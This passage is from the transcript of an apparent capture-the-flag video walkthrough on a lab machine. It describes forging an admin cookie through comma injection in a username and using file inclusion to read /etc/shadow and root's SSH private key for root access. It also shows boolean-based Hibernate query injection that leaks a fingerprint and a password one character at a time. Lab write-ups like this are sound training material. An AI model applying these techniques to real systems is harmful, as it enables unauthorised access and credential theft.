need. So we can get like probably a super performance increase if we move this valid check above this loop. But we'll do that after we finish this. So we can say if test block valid, and then we can say padding plus guess. And if that test block is correct, we can say known is equal to known plus C and break. So the padding would be, if we didn't have known as question mark, the padding would be 15 A's and guess would be a comma. And yeah, hopefully it's been making sense. We're going to see if this works. So we get 5, 6, 7, and it's moving across. So it does. But this is going slow, so I'm going to see if I can speed this up a bit because we want to move valid up here. And we don't have padding defined. Total size, that's always going to be 1, right? Oh no, guess is known plus C. Yeah. So for this, we can just say what if we could define padding above here? And instead of length of guess, we do length of known plus 1. Because we know the guess, like, that's always going to be added 1 character here. So let's run this. Padding is not defined. What did I call it? Padding? Oh, there we go. That did not work. That did not work in the slightest. So let's see. Minus length of known plus 1. I thought that would be it. If we just do length of known. I don't know why it's always saying 0 is valid here. So known plus 1. So what was it before? We have some weird mistake. Oh, I think it's an order of operations thing. So if we put, come on cursors, type, there we go. So we want to minus this 1. So we're subtracting the length of known, which would be 1, and then we're adding 1. So we're doing minus 1 plus 1, which is stupid. It should be minus 2, and this should fix it up. So if we run this, there we go. And you can see that is going much faster than it was previously. So I'm going to, I guess, pause the video and just let this run because it takes a while to run. Let's just do time. And we also actually don't have it ever stopping. We never killed a while loop, so it's just going to like spin indefinitely. And when it does that, we know we have brute forced it. So yeah. And we can see the script is almost finished. We have the secret here, and then the application did comma false because we're not an admin, and I'm guessing this wheel is just going to spin indefinitely because we never coded that stop. So I'm just going to kill this once it gets back into, I guess, the lowercase. It's doing the symbols now of it. And here we go. It just did a complete loop. So we can kill it. It took about 6 minutes to run. So with this, where is it? Uh-oh. That kill was not a good thing. There we go. We can brute force, or not brute force, we can create our own cookie that gives us admin privilege. So let's take a look back at the code. We have it, let's see. Just going to do a new window. And if we went in Flask backup, app.py, let's see, where is the function for checking? UID. Okay, so it's going to split upon comma secret, and that's how it's going to get the UID. Where is the admin check? Oh, is admin. So it's going to split on the second value. So if we just create a username like admin, comma, secret, comma, true, then it's going to append comma, secret, comma, false, right? So this split will hopefully have the very first value as admin and then the second value as true. I guess we can test this out. Let's see. Can we easily test this out? Let's do Python 3, and we can say s is equal to admin, comma, secret, comma, true, comma, secret, comma, false. Because this is what the string is going to be. And if we do a s.split, comma, plus, comma, secret, comma, but this, we have admin, true, and false. And 0 is going to be admin, 1 is going to be true, right? So that's what we're going to attempt here. So we can, I was trying to unhighlight that. If I just copy this, we can go back to our curl, and the new name is going to be admin, comma that, comma true. And it's going to append that comma for us. So this cookie will hopefully be one that has admin privilege so we can access the LFI again on this old app, or the new app. So let's do localhost 8088. And then I'm going to, we can delete all cookies. And I can add a new cookie. We'll call it user underscore ID. Put the value of this. And if we do /admin, how about /profile, method not allowed, /admin did not, oh, we have user ID equals and our cookie. There we go. Let's try this. /admin. And we get in. And if we view it, we can. We can send this over to Burp Suite. And this application is running as root. So we should be able to include any file. So if we did get admin and then like proc self CMD line, see if this works. We have it. It's running Flask on port 8088. If we did environ, we can get the environment. I was trying to remember which one I normally do to get username. It's Flask, that's the name of the application. We could try including like Etsy shadow, and we can try root.ssh ID RSA. We got a key, and we can just copy and paste this key in. So we can copy this, and v root.key, paste it, chmod 600 root.key, sh-i, root at 10.10.11.127. And we have successfully rooted the box. So, yeah, hope you guys enjoyed this video. I think there was one piece I wanted to do a video on, that is the Hibernate, if we could brute force the fingerprint, because we know the fingerprint here, so we may be able to do like substring and do a blind brute force to get this fingerprint. We could also probably do password as well. So I guess we can do that real quick and then call it a video. So we're back here at this login form. This is where the Hibernate vulnerability was. So we do admin password, intercept, and send it to our Burp Suite. Here's the login. And remember, if we did a question mark, we had this Hibernate error. We do or substring, I think it was username 11 is equal to M. And this was single quote M, like this. And this passes us, right? internal server error sub str, is it? Or substring? Yeah. So now we have invalid fingerprint ID. So if we did this any other character other than A, we get invalid credentials. So if we tried fingerprint, and we know the very first one is 9, substring fingerprint, I put the 9 on the wrong end of that quote. We have invalid fingerprint ID again. If we make this a 2, we have invalid credentials. If we look at this, we know it's 9, 9. So we can try 9, 9 here. Invalid fingerprint. So we can add a 3, and this should be a C. So go C, invalid fingerprint. If we did anything else, it would be invalid credentials. So this is a way we could brute force and get the fingerprint without doing any cross-site scripting. We could also do it on password. So we could say password 11 is equal to 0. Maybe that's a capital O. Invalid fingerprint, and then 9. Oh, we have to make this 2 characters long. We get a 9, and we can brute force 1 character at a time through this boolean injection. Right. So, hope you guys enjoyed the video. Take care, and I will see you all next time.